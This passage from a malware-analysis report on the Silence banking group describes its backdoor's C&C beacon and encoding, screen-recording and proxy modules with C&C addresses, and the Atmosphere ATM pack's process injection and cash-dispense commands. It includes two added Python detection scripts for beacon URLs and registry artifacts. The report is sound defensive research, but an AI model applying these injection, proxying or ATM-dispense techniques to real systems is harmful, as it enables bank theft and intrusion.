The files are\r\nsaved in the folder where the executable file of the Trojan was launched.\r\n• If none of the control commands of the C\u0026C were received, the connection can\r\nbe re-established right away or with a 1 or 10-second delay and in cycle.\r\nHow are arbitrary commands launched?\r\nAfter receiving the shell command, the backdoor can receive an arbitrary\r\ncommand from the C\u0026C server for execution (\\n\u003ccmd\u003e). For example, it might be a\r\ncommand to enumerate local network interfaces, \"ipconfig\". Below is a screenshot\r\nof the client-server traffic with a server sending this command to a client.\r\nAfter receiving the command, the program writes it into stdin of the command\r\ninterpreter using the WriteFile() function. The command interpreter then executes\r\nthe command. Next, the backdoor waits for the results of command execution,\r\nreads it using ReadFile() function and sends the output to the C\u0026C server.\r\nInteraction with command interpreter\r\nThe bot does not embed into the cmd.exe process. The launch of commands\r\nand receiving the results is done by creating a command interpreter process\r\nand stating data input and output devices (handles) that are open in the current\r\n(parent) process of the objects (pipes). 
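Because the registration request (xy=1), the client-id poll (xy=2&axy=...) and the hard-coded User-Agent are fixed strings, the beacon shape is a usable detection signature. The script below is an added example, not code from the Group-IB report: it classifies constructed web-proxy log lines by beacon stage and extracts the client identifier. The log line format (timestamp, client IP, method, URL, quoted User-Agent) is an assumption made for this example; the lab C&C address 192.168.19.171 is the one shown in the report's screenshots.

```python
"""Flag Silence.MainModule beacon requests in (constructed) web-proxy log lines.

Added example, not code from the Group-IB report. The URL shape, the
hard-coded xy=1 registration and the 2017 User-Agent come from the report;
the log line format is an assumption made for this example.
"""
import re
from typing import Dict, List, Optional

# Log line format assumed here: <timestamp> <client-ip> <method> <url> "<user-agent>"
LOG_RE = re.compile(r'^(?P<ts>\S+) (?P<src>\S+) (?P<method>\S+) (?P<url>\S+) "(?P<ua>[^"]*)"$')

# xy=1 registration, xy=2 command poll with the client id in axy,
# bxy carries cmd.exe output in the custom alphabet (letters, digits, ",-._/").
BEACON_RE = re.compile(
    r"^https?://[^/]+/index\.php\?xy=(?P<xy>[123])"
    r"(?:&axy=(?P<axy>\d+))?(?:&bxy=(?P<bxy>[A-Za-z0-9,._/\-]+))?$"
)

# User-Agent seen in 2017 builds per the report.
KNOWN_USER_AGENTS = {"Microsoft Internet Explorer"}


def classify(line: str) -> Optional[Dict[str, object]]:
    """Return a finding for a beacon-shaped request, or None for other traffic."""
    m = LOG_RE.match(line)
    if not m:
        return None
    b = BEACON_RE.match(m["url"])
    if not b:
        return None
    if b["bxy"] is not None:
        stage = "result-upload"
    elif b["xy"] == "1":
        stage = "registration"
    elif b["xy"] == "2":
        stage = "command-poll"
    else:
        stage = "result-upload"  # xy=3 with no payload is still the upload endpoint
    return {
        "ts": m["ts"],
        "src": m["src"],
        "stage": stage,
        "client_id": b["axy"] or "",
        "known_ua": m["ua"] in KNOWN_USER_AGENTS,
    }


def scan(lines: List[str]) -> List[Dict[str, object]]:
    """Run classify() over a batch of log lines and keep the findings."""
    return [f for f in (classify(line) for line in lines) if f is not None]


# Constructed sample log; the C&C address is the lab address used in the report.
SAMPLE_LOG = [
    '2018-03-01T10:00:01Z 10.0.0.5 GET http://192.168.19.171/index.php?xy=1 "Microsoft Internet Explorer"',
    '2018-03-01T10:00:02Z 10.0.0.5 GET http://192.168.19.171/index.php?xy=2&axy=1234567890 "Microsoft Internet Explorer"',
    '2018-03-01T10:00:03Z 10.0.0.7 GET http://intranet.example/index.php?page=1 "Mozilla/5.0"',
    '2018-03-01T10:00:04Z 10.0.0.5 GET http://192.168.19.171/index.php?xy=3&axy=1234567890&bxy=AiL7aIm3Bzpx "Microsoft Internet Explorer"',
]

if __name__ == "__main__":
    for finding in scan(SAMPLE_LOG):
        print(finding)
```

Matching on the full query shape rather than on the host keeps the rule useful when the C&C address changes; the client id recovered from axy lets an analyst tie the registration, the polls and the uploads of one infected host together.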
This is done by means of the _STARTUPINFO system structure and the flag bInheritHandles == TRUE (which allows the child to inherit handles of the parent process).\r\nThe exchange of data with the command interpreter is implemented by calling the WriteFile (to launch the commands) and ReadFile (to obtain the results of their execution) functions.\r\nThe scheme for launching arbitrary commands:\r\n• Reads a new command in a loop, if one has appeared\r\n• Sends the new command for execution to stdin of the command interpreter\r\n• The file under investigation receives the data size available for reading (len) from the pipe\r\n• Reads len bytes from stdout of the command interpreter\r\n• Encodes the data (the result output) and sends it to the C\u0026C server\r\n• Re-checks for new data every second\r\n• Checks whether the command interpreter has been closed every second\r\nThe data from the command interpreter is retrieved using the PeekNamedPipe (reading the size of the buffer) + ReadFile (reading the content of the output) functions. The read data is encoded using a custom coding algorithm with its own alphabet, \"AiL7aIm3BzpxbZq0CKs5cYU1Dkt-dVw.Elr9eNW_FnT8fOu4GoS,gvR6HMQ2hyPX/\".\r\nDespite the fact that the coding algorithm uses random data generation, the resulting coded data can be decoded on the server by the attacker because:\r\n1. The random data generator has low entropy (it only generates digits from 0 to 3);\r\n2. The random data generator was designed this way to ensure that the random data can be eliminated by the formula (because the result of the multiplication is always divisible by 4, and the random numbers are always less than 4);\r\n3. Each character of the source data is coded into two symbols using two different arithmetic operations (formulas).
This allows the source data to be decoded by solving the combined equations.\r\nThe usage of pseudo-random numbers helps to avoid detection by security systems.\r\n \r\nAfter execution of a command in the command interpreter, the output is encoded and sent to the C\u0026C server in the following format: \"http://cnc/index.php?xy=3\u0026axy=\u003cresponse1\u003e\u0026bxy=\u003cencoded_cmdexe_data\u003e\"\r\nAn example of the request is presented below:\r\nData intake after execution in the command interpreter:\r\nCoding:\r\n1 – Data before coding\r\n2 – Data after coding\r\nThe encoded data is then sent to the C\u0026C server:\r\nSilence.SurveillanceModule\r\nFile name | MD5 hash | Type of software\r\nsmmsrv.exe | 242b471bae5ef9b4de8019781e553b85 | Silence.SurveillanceModule, desktop video recorder\r\nmss.exe | d7491ed06a7f19a2983774fd50d65fb2 | Screenshotter\r\nsmmsrv.exe is an executable file for capturing the screen content of the infected machine. To do this, the software uses the StartServiceCtrlDispatcher function to create its own service called \"Default monitor\".\r\nThe service processes only one command, namely SERVICE_CONTROL_STOP. After receiving the command, the service switches to SERVICE_STOP_PENDING status. If there is an error, it displays the debugging string: \"ServiceCtrlHandler: SetServiceStatus returned error\".\r\nThe event and the thread in which all functions are performed are created at the entry point of the service. During creation, there might be some errors.
The bot will give\r\nnotification of this using the following debugging messages:\r\n• \"My Sample Service: ServiceMain: SetServiceStatus returned error\"\n\nSilence\r\nMoving into the darkside\r\n54\r\n• \"ServiceMain: SetServiceStatus returned error\"\r\n• \"ServiceMain: CreateEvent returned error\"\r\n• \"ServiceMain: RegisterServiceCtrlHandler returned error\"\r\nIn the main function, the following actions happen during an infinite loop:\r\n• If there is no pipe index: \"\\\\.\\pipe\\{73F7975A-A4A2-4AB6-9121-AECAE68AABBB}\"\r\nthe pipe is created.\r\n• Reading the content of mss.txt file, which has to be located in the same folder\r\nas the file under investigation. The file contains the name of a user, from which\r\nit should start the mss.exe program (described further).\r\n• Decompression and saving the C:\\Users\\\u003c%Username%\u003e\\AppData\\Local\\Temp\\\r\nmss.exe file\r\n• Launch of the mss.exe application on behalf of the user, which is described in\r\nmss.txt (the functionality of the application is described further)\r\n• Reading data from pipe, converting it to image/png format and saving to the C:\\\r\nUsers\\\u003c%Username%\u003e\\AppData\\Local\\Temp\\out.dat file. Errors that occur while\r\nworking with the out.dat file are logged as debugging messages by the bot:\r\n\"Error code \u003c%result of GetLastError%\u003e\\n\"\r\nmss.exe, extracted by the previous program, takes screenshots in cycles, converts\r\nthem into image/bmp and streams. 
After this, it writes everything into a pipe with the following name: \"\\\\.\\pipe\\{73F7975A-A4A2-4AB6-9121-AECAE68AABBB}\".\r\nThe program features a check for launch in a sandbox:\r\nThus, the out.dat file contains a pseudo-video stream.\r\nSilence.ProxyBot\r\nFile name | MD5 hash\r\nsamsung.exe | 121c7a3f139b1cc3d0bf62d951bbe5cb\r\nsok83.exe | dc4ac53350cc4b30839db19d8d6f3b5f\r\nfirefoxportebles.exe | a6cb04fad56f1fe5b8f60fabf2f64005\r\napp.exe | a6771cafd7114df25ac0ef2688722fdf\r\napcs.exe | 88cb1babb591381054001a7a588f7a28\r\nThe file is written in Delphi and has functions for traffic redirection between a remote and a local server. It can collect and send information about the system to the remote server and save the data to the registry. The program, classified as ProxyBot, is designed to access isolated segments of the network via an intermediate node.\r\nThe executable file contains two strings of great length, which are not involved in normal operation. They could be used, but the developers created a condition for this which is never true.\r\nOnce launched, the program performs the following activity:\r\n• The random number generator generates a random number from 0 to 10. The code for working with the abovementioned lengthy strings is only executed when the random number generator produces the number 36567, which never happens.
Obviously, this piece of code was added for testing purposes or, most likely, to evade security tools.\r\n• If the application was launched with command line arguments, then the following data is written to the registry: HKLM\\SYSTEM\\CurrentControlSet\\Services\\MicrosoftService\\Note = \u003ccommand line arguments\u003e\r\n• It is important that the registry receives data from the command line arguments, and this data can be sent to the server even on subsequent launches, when the client is launched with no arguments at all. Thus, the application under investigation can be used to collect other data, save it (passed as a command line argument at launch) into the registry, and then send it.\r\n• A new registry value called TypesSupported is created. It is not used anywhere further: HKLM\\SYSTEM\\CurrentControlSet\\Services\\Eventlog\\Application\\Microsoft Audit Service\\TypesSupported = 7\r\n• The file under investigation tries to connect to the 185.29.10[.]117:443 network node.\r\n• The program features two ports: 443 and 444. The first one, 443, is the remote port used to connect to the C2.
The second one, 444, is used\r\nonly once when sending data about the system from the client to the server.\r\nStated in the file but not used ports for possible connections: 3389 and 8081\r\n• The connection is established at the layer of TCP sockets (Http and Https\r\nprotocols are not used)\r\n• If the connection is not established, the attempts to connect and send files will\r\nbe repeated every 42 seconds or 1 minute (in two different threads).\r\n• After successful connection, the server gets information about the system: a\r\nstring with 16 random characters, PC name, user name, system right (user SID),\r\ncountry\\locale, local IP, number of the second port embedded into the build.\r\nThe length of the statistics package is always 208 bytes.\n\n57\r\n• The file performs 3 different requests to the server. If the responses are not\r\nequal to zero, it makes 4 more requests in a row (4th,5th,6th,7th requests).\r\n• Then the new TBacklinkClientThread thread is launched. The C\u0026C server\r\naddress and 2 additional arguments are passed in the thread as arguments.\r\nThe first argument is the response to the server’s request 1 and is also the\r\nport for connecting to the remote server and traffic redirection. The second\r\nargument is the server’s response to request 4.\r\n• The connection to the C\u0026C server is established via the port from the response\r\nto request 1. The data from response 4 is sent there.\r\n• If the connection is successful and the response is received, the\r\nTSocksClientThread thread is launched.\r\n• The client reads another portion of data from the server and decrypts it. The\r\nencryption is done using XOR operations with a 0Dh byte\r\nTherefore, partially binary and partially textual protocol with encryption is\r\nused by the server to send commands to the client to request data from other\r\nnetwork nodes (stated by the server). 
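The registry artifacts described in this chapter (the javaplatform Run entries written by Silence.MainModule, the MicrosoftService\Note and TypesSupported values written by Silence.ProxyBot, and the KingKongThai\cc key used by the patched Kikothac bot) can be checked offline from a regedit export. The script below is an added example, not code from the Group-IB report or from the malware: it parses .reg text and reports every value that matches one of those artifacts. The sample export is constructed, and the autorun path in it is a placeholder.

```python
"""Triage a Windows registry export (.reg text) for the Silence host artifacts
described above: the javaplatform Run entries of Silence.MainModule, the
MicrosoftService\\Note and TypesSupported values written by Silence.ProxyBot,
and the KingKongThai\\cc key used by the patched Kikothac bot.

Added example, not code from the Group-IB report. The sample export below
is constructed; the autorun path in it is a placeholder.
"""
import re
from typing import Dict, List, Optional, Tuple

HIVE_ALIASES = {"HKEY_CURRENT_USER": "HKCU", "HKEY_LOCAL_MACHINE": "HKLM"}

# (key, value name or None for "any value under this key", description)
INDICATORS: List[Tuple[str, Optional[str], str]] = [
    ("HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run", "javaplatform",
     "Silence.MainModule autorun entry"),
    ("HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\Run", "javaplatform",
     "Silence.MainModule autorun entry"),
    ("HKLM\\SYSTEM\\CurrentControlSet\\Services\\MicrosoftService", "Note",
     "Silence.ProxyBot stored command-line data"),
    ("HKLM\\SYSTEM\\CurrentControlSet\\Services\\Eventlog\\Application\\Microsoft Audit Service",
     "TypesSupported", "Silence.ProxyBot marker value"),
    ("HKLM\\Software\\KingKongThai\\cc", None,
     "patched Kikothac configuration store"),
]

VALUE_RE = re.compile(r'^"([^"]+)"=(.*)$')


def normalize_key(key: str) -> str:
    """Canonical form: short hive name plus case-folded path, for comparison."""
    hive, _, rest = key.partition("\\")
    hive = hive.upper()
    return HIVE_ALIASES.get(hive, hive) + "\\" + rest.lower()


def parse_reg_export(text: str) -> Dict[str, Dict[str, str]]:
    """Parse regedit export text into {normalized key: {value name: raw data}}."""
    keys: Dict[str, Dict[str, str]] = {}
    current = None
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith(";") or line.startswith("Windows Registry Editor"):
            continue
        if line.startswith("[") and line.endswith("]"):
            current = normalize_key(line[1:-1])
            keys.setdefault(current, {})
            continue
        m = VALUE_RE.match(line)
        if m and current is not None:
            keys[current][m.group(1)] = m.group(2)
    return keys


def find_indicators(keys: Dict[str, Dict[str, str]]) -> List[Tuple[str, str, str, str]]:
    """Return (key, value name, raw data, description) for every matching artifact."""
    hits = []
    for ind_key, ind_name, description in INDICATORS:
        values = keys.get(normalize_key(ind_key), {})
        for name, data in values.items():
            if ind_name is None or name.lower() == ind_name.lower():
                hits.append((ind_key, name, data, description))
    return hits


# Constructed sample export (paths are placeholders, not values from the report).
SAMPLE_EXPORT = r"""Windows Registry Editor Version 5.00
; constructed sample

[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run]
"javaplatform"="C:\\PLACEHOLDER\\MicrosoftUpdte.exe"
"OneDrive"="C:\\Program Files\\OneDrive\\OneDrive.exe"

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\MicrosoftService]
"Note"="collected-data"

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Eventlog\Application\Microsoft Audit Service]
"TypesSupported"=dword:00000007

[HKEY_LOCAL_MACHINE\Software\KingKongThai\cc]
"val_a"="1"
"val_b"="0"
"""

if __name__ == "__main__":
    for hit in find_indicators(parse_reg_export(SAMPLE_EXPORT)):
        print(hit)
```

Keys are compared after case-folding and hive-name normalization, so an export that spells the hive as HKEY_LOCAL_MACHINE matches an indicator written as HKLM; the KingKongThai\cc entry matches any value under the key, since the report shows the bot managing arbitrary value names there.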
In other words, the client can be used as an\r\nintermediate proxy server.\r\nSilence.ProxyBot.Net\r\nFile Name MD5 hash Type of software\r\nsapp.exe\r\nSocksTest.exe\r\n50565c4b80f41d2e7eb989cd24082aab Silence.ProxyBot.NET\r\nbackconnect proxy\r\nSocksTest.exe 8191dae4bdeda349bda38fd5791cb66f\r\nIn the beginning of 2018, we discovered the new version of the ProxyBot\r\ndeveloped for the .NET framework. The file named sapp.exe_ (56767 bytes, md5:\r\n50565C4B80F41D2E7EB989CD24082AAB) is an executable program for .Net. The\r\noriginal name of the program is SocksTest.exe. According to the information from\r\nthe PE heading of the file, it was compiled on January 25, 2018.\n\nSilence\r\nMoving into the darkside\r\n58\r\nThe program executes the tasks of the proxy server and allows the attacker\r\nto redirect traffic from the current node to the backconnect server at\r\n185.161.208[.]61:443. The supported protocols are Sock4\\Socks5. The program is\r\ncompiled for .NET and needs the .NET Framework 4.0 package installed to launch.\r\nThe SmartAssembly tool is used for obfuscation.\r\nThe proxy contains encrypted settings for its operation, which are decrypted\r\ndynamically using one of the methods from the SocksTest.Settings class. The\r\ndecrypted settings of the proxy are presented below:\r\nFrom these settings it is clear that for its operation the proxy uses a backconnect\r\nserver at 185.161.208[.]61 port 443, user name \"noname\" and password\r\n\"password\".\r\n• When connected to the backconnect server, the proxy sends a request with the\r\nname of the current user and version of the operating system.\r\n• The file under investigation can create a log file and write debugging\r\ninformation about the operation of the application. 
However, in the current configuration and with the current application settings, the log file is not created (DebugEnabled=false).\r\n \r\nThe log would be saved to c:\\intel\\slog.log\r\n• If the connection with the backconnect server is lost, the file under investigation tries to reconnect in a loop.\r\n• The backconnect server may send commands to the proxy to make network requests to arbitrary network nodes and redirect the results back to the backconnect server.\r\n• The proxy supports the following protocols: Socks4\\Socks5.\r\nBelow you will find the first request sent from the program to the backconnect server:\r\nDespite the fact that the sniffer recognizes the traffic as SSL, this is not the case. As you can see in the image above, the data transferred is not encrypted.\r\nSILENCE ATM PACK\r\nLogical attacks on ATMs were the first activity of the Silence group that we detected. The attackers would penetrate the bank’s corporate network, gain entry to the virtual network to which all ATMs were connected, and inject unique programs into the ATMs that affected the dispenser process operations.\r\nThis unique pack incorporated the following programs:\r\n• A Dropper that unpacks (out of itself) the Atmosphere library to affect the dispenser, and the injector that injects Atmosphere into the dispenser process.\r\n• The basic Atmosphere DLL library to affect the dispenser.\r\n• An executable injector program to inject the library into the process.\r\nAtmosphere.Dropper\r\nFile name | MD5 hash\r\napp3.exe | 4107F2756EDB33AF1F79B1DCE3D2FD77\r\napp4.exe | 6743F474E3A6A02BC1CCC5373E5EBBFA\r\napp11.exe | 14863087695D0F4B40F480FD18D061A4\r\nJ133295_18107_a4.exe | f69c35969745ae1b60403868e085062e\r\nIn the course of further analysis of the group, we identified a large number of programs of that type. It was clear that the programs were compiled on the go, as the attack was unfolding.
Some of them did not work, being designed for ATMs of one specific type, while the attackers tried to use them on ATMs of a different type. Thus, programs had to be compiled along the way. As a result, some Droppers had to inject the library to affect the dispenser into a strictly defined process; others only had to extract the library, while the injection was done by a separate Injector program. In total, we detected up to 10 types of programs with minor differences between them. Most of them had logical errors that in some cases caused program failure.\r\napp3.exe works by injecting code into the XFS Manager’s process fwmain32.exe (or, alternatively, sop.exe) on Wincor Nixdorf ATMs; it uses API functions exported by the MSXFS.dll library to affect the ATM, to gain information about the ATM and the amount of cash in its cassettes, and to issue banknotes to the attacker.\r\n• When run, this file checks if the process fwmain32.exe is running. If not, it shuts down.\r\n• fwmain32.exe is the XFS Manager’s application process on Wincor Nixdorf ATMs.\r\n• If the process fwmain32.exe is found running, it extracts the dynamic library 86EA1F46DF745A30577F02FC24E266FF (MD5) and saves it to the directory C:\\intel\\ as lib_\u003crand_chars\u003e.dll, where rand_chars are characters from [A-Za-z] and [\\]^_`.\r\nExamples of file names:\r\n\"c:\\intel\\lib_`TKXV.dll\"\r\n\"c:\\intel\\lib_m_rMJ.dll\"\r\n\"c:\\intel\\lib_f`lUX.dll\"\r\nImportant: The directory c:\\intel is assumed to exist. If it does not, this file does not create it.
The program tries to check whether the directory C:\\intel\\ exists by calling the WinAPI function GetFileAttributesA.\r\nThe programmer overlooked the fact that if the requested path does not exist at all, the function returns INVALID_FILE_ATTRIBUTES, i.e. -1 (0xFFFFFFFF). Since 0xFFFFFFFF \u0026 0x10 (FILE_ATTRIBUTE_DIRECTORY) is non-zero, the condition !(0xFFFFFFFF \u0026 0x10) evaluates to false, the directory is treated as present, and it is not created.\r\n• It then injects the said dynamic library into the process fwmain32.exe using the standard \"Thread Hijack\" technique: OpenProcess + GetThreadContext + WriteProcessMemory + SetThreadContext + ResumeThread.\r\n• The payload is run as shellcode to load its DLL file.\r\n• The executable file runs the code of the said dynamic library in the context of the process fwmain32.exe and shuts down.\r\n• As it operates, it shows debug information on the console.\r\nAtmosphere.Injector\r\nFile name | MD5 hash | Program type\r\nfuckacp.exe | B3ABB10CC8F4CBB454992B95064A9006 | Atmosphere.Injector\r\ninjector.exe | 1EE9F88CC7867E021A818DFF012BDF9E | Atmosphere.Injector\r\nThis program helps the attacker to inject a DLL into the relevant process. Command line parameters are used to specify which dynamic library must be injected into which particular process. It is worth noting that the process is identified not by its name, but by its system identifier (process id).\r\nThe code for dynamic library injection is similar to that in the dropper.\r\nSimilarly, we detected several programs of that type. Their compilation settings were different and some libraries were statically linked.
This is most likely\r\nbecause the attacker could not run the program on those ATMs which did not\r\nhave libraries that the program required.\r\nAtmosphere\r\nFile name MD5 hash Program type\r\nlib_HpBsi.dll 79E61313FEBE5C67D168CFC3C88CD743 Atmosphere\r\nli.dll C49E6854C79043B624D07DA20DD4C7AD Atmosphere\r\nlib_HkUEl.dll 86EA1F46DF745A30577F02FC24E266FF Atmosphere\r\nc8d0ccd2e58c1c467ee8b138c8a15eec\r\nd81ae5e0680d09c118a1705762b0bfce\r\nlib_xqkRN.dll ddb276dbfbce7a9e19feecc2c453733d\r\nThere are several programs of that kind too. See below for analysis results and\r\ndifferences.\n\n63\r\nThe file lib_HkUEl.dll (size 61440 bytes, md5: 86EA1F46DF745A30577F02FC24E266FF)\r\n• This malicious file operates by injecting code in XFS Manager’s process\r\nfwmain32.exe for Wincor Nixdorf ATMs and using API functions exported by the\r\nlibrary MSXFS.dll (loaded into the process fwmain32.exe).\r\n• As the dynamic library is run/loaded into the address range of the process (in\r\nour case, the app fwmain32.exe), a new thread is started.\r\n• Once the library is unloaded (or the fwmain32.exe parent process terminates),\r\nthis thread terminates.\r\n• In the course of operation, this file creates the file c:\\intel\\___log.txt and writes\r\nits operations log in it.\r\n• This file uses / may call the following XFS API functions:\r\n• It copies pointers and creates trampoline to functions WFSGetInfo and\r\nWFSExecute in its dynamic memory.\n\nSilence\r\nMoving into the darkside\r\n64\r\n• By calling function WFSGetInfo with flag dwCategory == WFS_INF_CDM_CASH_\r\nUNIT_INFO the attacker can gain information about the status and contents of\r\nall cassettes in the ATM.\r\n• The dispenser is identified by calling the function WFSGetInfo with the flags\r\ndwCategory == 301(WFS_INF_CDM_CASH_UNIT_INFO) and 401 (value unknown).\r\n• The function WFSGetInfo to identify the dispenser is called sequentially 30\r\ntimes with different hService values ranging from 1 to 30 – obviously to 
search\r\nfor services in the system and locate the service handle that corresponds to the\r\nrunning ATM service. This could be done by calling the function WFSOpen, but\r\nthe attacker probably thought that the argument of the first function (the ATM’s\r\nlogical name in the system) could be non-standard or different on different\r\nATM types, so he decided to do an ATM device search by using the brute force of\r\nopen service handles.\r\n• A thread is then created to check every one second if there are commands from\r\nthe attacker and execute them if needed\r\nCommand transmission\r\nOnce the command file is found, its contents are read by the function \"fread\" and\r\nare then split into lines. Characters between quotation marks (\") are extracted\r\nfrom the first line. Then the first character extracted from quotation marks is\r\nconverted into a command number. Once the command is received, WinAPI of the\r\nfunctions CryptAcquireContextA and CryptGenRandom generates a line with a\r\nrandom set of characters. The size of the line is not less than the size of the file,\r\nplus a random number between 10 and 1024. 
The resulting line is then added to\r\nthe end of the file, and the file is deleted.\n\n65\r\n• The bot receives commands as newly created files with *.cmd in this file’s root\r\ndirectory.\r\n• If there is any file with the extension *.cmd, the app will search for, open and\r\nread it.\r\n• After reading, the command file is supplemented by random data of random\r\nlength and the file is deleted\r\nCommands in the file *.cmd are transmitted as plain text: \u003cone_upper_char\u003e\r\n(including quotations marks).\r\nThe command that is activated depends on the character between the quotation\r\nmarks.\r\nFor example, if the content of the command file is A (with quotation marks), the\r\ncommand indexed 3 will be executed: retrieve information about ATM cash units.\n\nSilence\r\nMoving into the darkside\r\n66\r\nSupported commands are listed below.\r\nCommand Description\r\n1,8,9,10,11,12,13 Write return code of the last executed command in a separate\r\nfile and log file\r\n2 Retrieve ATM cash unit data and write the result in the log file,\r\nwith formatting (advanced write mode)\r\n3 Retrieve ATM cash unit data\r\n4 Retrieve ATM cash unit data and write the result in the log file\r\n5 Inject code\\modify the command counter of the current\r\napp’s random thread (fwmain32.exe) by calling the\r\nfunctions sequence GetCurrentProcessId + OpenThread +\r\nGetThreadContext + SetThreadContext\r\n7 Issue cash in a one-off mode\r\n? Issue all cash, interval 3 seconds\r\n? Establish a limit on cash issuance\n\n67\r\nTo withdraw cash, the attacker first executes commands to retrieve information\r\non the existing banknotes. 
This information is also recorded in the log file as the\r\nfollowing line:\r\n|INDEX:\u003ca\u003e|CU state:\u003cb\u003e|Type:\u003cc\u003e|Values:\u003cd\u003e|Currency_ID:\u003ce\u003e|Money count:\u003cf\u003e|,\r\nwhere a is the index, b is the state of the cassette (full/empty, etc.), c is the\r\ncash unit type, d is the banknote nominal value, e is the currency by ISO (three-character), and f is the current number of banknotes.\r\nThis is followed by command D to withdraw cash.\r\nWhen this command is executed, a file is created named as a command file, but\r\nwith extension 007, i.e. if the command file is second.cmd, the new file will be\r\nsecond.007, with the code of the last executed command. The log file will also\r\nhave the following line:\r\n[2017/11/15 18:15:24.111] last command response code 0\r\nThe resulting code for last command execution is also written at the end of the\r\nline.\r\nAmong other things, we also found an old virtual interface table that handles\r\ncommands in the code. The handler looks different there: it can issue banknotes\r\nfrom all the cassettes one by one with an interval of 3 seconds. Banknote issue is\r\ntriggered by the same function everywhere, including this handler.\r\nShown below is the code that adds unnecessary information and deletes the file.\r\nPresumably, the file should have been rewritten by the generated string and\r\ndeleted afterwards, but in fact this string is only added to the end of the file, as\r\ncan be seen from the snapshot above.\r\n \r\nIt is worth noting that one iteration of the program can only process one file and\r\nonly one command from it. 
Even though the content is broken down into lines, it\r\nis only the first line that is processed, and only the first character from it (the one\r\nbetween quotation marks) is used and converted to the command number.\n\nSilence\r\nMoving into the darkside\r\n68\r\nWithdrawing cash\r\nCash is withdrawn by calling the function WFSExecute with the flag\r\ndwCommand==WFS_CMD_CDM_DISPENSE (issue banknotes from cassettes).\r\n \r\nFunction prototype:\r\nHRESULT extern WINAPI WFSExecute ( HSERVICE hService, DWORD\r\ndwCommand, LPVOID lpCmdData, DWORD dwTimeOut, LPWFSRESULT *\r\nlppResult);\r\nThe code of the WFS_CMD_CDM_DISPENSE command to issue banknotes from\r\ncassettes serves as the second argument.\r\nThe banknote denomination parameters are transmitted during the call.\r\nDenomination is a selection of the number of banknotes from specific cassettes\r\nto be put together as the required amount for withdrawal (i.e. which banknotes\r\nare to be issued).\r\nThe structure below serves as the third argument:\r\nIt is interesting to note that the field bPresent of this structure is set to TRUE.\r\nThis means that after the command is executed to collect banknotes from the\r\ncassettes, the dispenser will issue them to the customer. This explains why this\r\nfile does not use the command to issue cash directly (by calling WFSExecute +\r\ncommand code WFS_CMD_CDM_PRESENT).\n\n69\r\nThe file lib_xqkRN.dll (size 122880 bytes, md5: DDB276DBFBCE7A9E19FEECC2C45373\r\n3D) is a slightly different version of Atmosphere.\r\nA binary comparison of the files lib_xqkRN.dll and lib_HkUEl.dll shows that 38%\r\nof the first file’s functions equals ~100% of the functions with the corresponding\r\ncode in the second file (i.e. 71% of all of the functions of the second file). The\r\nfunctions designed to affect the ATM are practically overlapping. 
One significant\r\ndifference is that this file has functions to read keys entered on the PIN pad.\r\nThis command helps the attacker retrieve information on the physical\r\narrangement of keys on the PIN pad and can subsequently be used to give a\r\ncommand to issue cash on demand (manually on the attacker’s PIN pad).\r\nThis means that the attacker is able to control cash withdrawal not only remotely\r\n(by sending a command to the ATM) but also physically (by pressing a combination\r\nof keys on the PIN pad).\n\nSilence\r\nMoving into the darkside\r\n70\r\nOther differences between the first and the second files in the rest of the code\r\nare based on:\r\n1. Different compiler settings and optimization in the first and second files.\r\n2. The fact that the first file lib_xqkRN.dll has a code added to it that the second\r\nfile does not have. This also explains why the first file has a larger number\r\nof functions. Principally, it is a cryptographic class code to encrypt RSA, AES,\r\nMD5, SHA-1, for which no code has been detected.\r\n3. Additionally, the second file has a list of currencies that the first sample\r\ndid not have. The code operating with these strings in this file is not called\r\nanywhere.\r\nAnother version of Atmosphere lib_HpBsi.dll (MD5 79E61313FEBE5C67D168CFC3\r\nC88CD743, 61440 bytes, timestamp: 59D94BD5 (Sat Oct 07 21:49:09 2017)), which\r\nthe DROPPER extracts from its resources, is also designed for withdrawing\r\nbanknotes from ATM cassettes. It has minor differences and the following\r\ncommand table:\n\n71\r\nCommand Description\r\n\"B\" Retrieves information about the contents of ATM cassettes. 
The line \"cash units info received\" is added to the log.\r\n\"A\" | Retrieves information about the contents of the cassettes without logging.\r\n\"Q\" | Retrieves information about the contents of ATM cassettes.\r\n\"D\" | One-off issue of banknotes of a specific denomination from the ATM.\r\n\"H\" | Suspends all threads in the process, except for its own, and uses the GetThreadContext + SetThreadContext functions to redirect execution to its own function.\r\n\"M\", \"R\", \"S\", \"P\", \"T\", \"L\" | The result of the last command execution is written to the file C:\\intel\\\u003cchrs\u003e.007. This command is also executed by default at the end of any other command.\r\nWe have also detected Atmosphere \"li.dll\" (MD5 C49E6854C79043B624D07DA20DD4C7AD, 57344 bytes, timestamp: 59DA3AE9 (Sun Oct 08 14:49:13 2017)), with a ‘hacker-style’ representation of strings. Some debugging information that was available in the first library is not present, and many strings were modified, e.g., PinPad -\u003e \"QinQad\", DISPENSER -\u003e D1SP3NS3R, etc.\r\nThe command file extension is *.ccd, not *.cmd, but they share the same command handler, i.e. the commands have the same format and perform the same actions.\r\nIn April 2018, Silence attacked another Russian bank, using Atmosphere to empty its ATMs. There were minor differences compared to the previous versions, but it was clear that the developer had gone a long way to debug the program: he eventually got rid of the unnecessary functions and improved the program’s stability.\r\nThe program uses the following command handlers:\r\nCommand number | Command value\r\n2 | Retrieve information about ATM cash units and write the result in the log file, with formatting (extended write mode)\r\n3 | Retrieve information about ATM cash units\r\n4, 13 | Retrieve information about ATM cash units and write the result in the log file\r\n7 | One-off cash withdrawal\r\n10 | Suspend operations for 10 minutes\r\n11 | Terminate app operation\r\n8 | Withdraw all cash, interval 3 seconds\r\nBelow is a table that compares the old version with the new:\r\nFunction | Old sample | New sample\r\nWorking directory | c:\\intel | c:\\atm\\1\r\nProcess for injecting | fwmain32.exe | atmapp.exe\r\nMethod for launching payload after injection into the process | LoadLibrary shellcode | LoadLibrary shellcode (with minor changes)\r\nDebugging info shown in the console | In an extended format | In a brief format, only the number of detected processes\r\nList of XFS functions used | WFMFreeBuffer, WFMAllocateBuffer, WFSExecute, WFSFreeResult, WFSGetInfo | WFMFreeBuffer, WFMAllocateMore, WFMAllocateBuffer, WFSExecute, WFSFreeResult, WFSStartUp, WFSGetInfo\r\nFile size | 60 Kbytes | 84 Kbytes\r\nCreating springboards on WFS* functions | Yes | No\r\nRetrieving 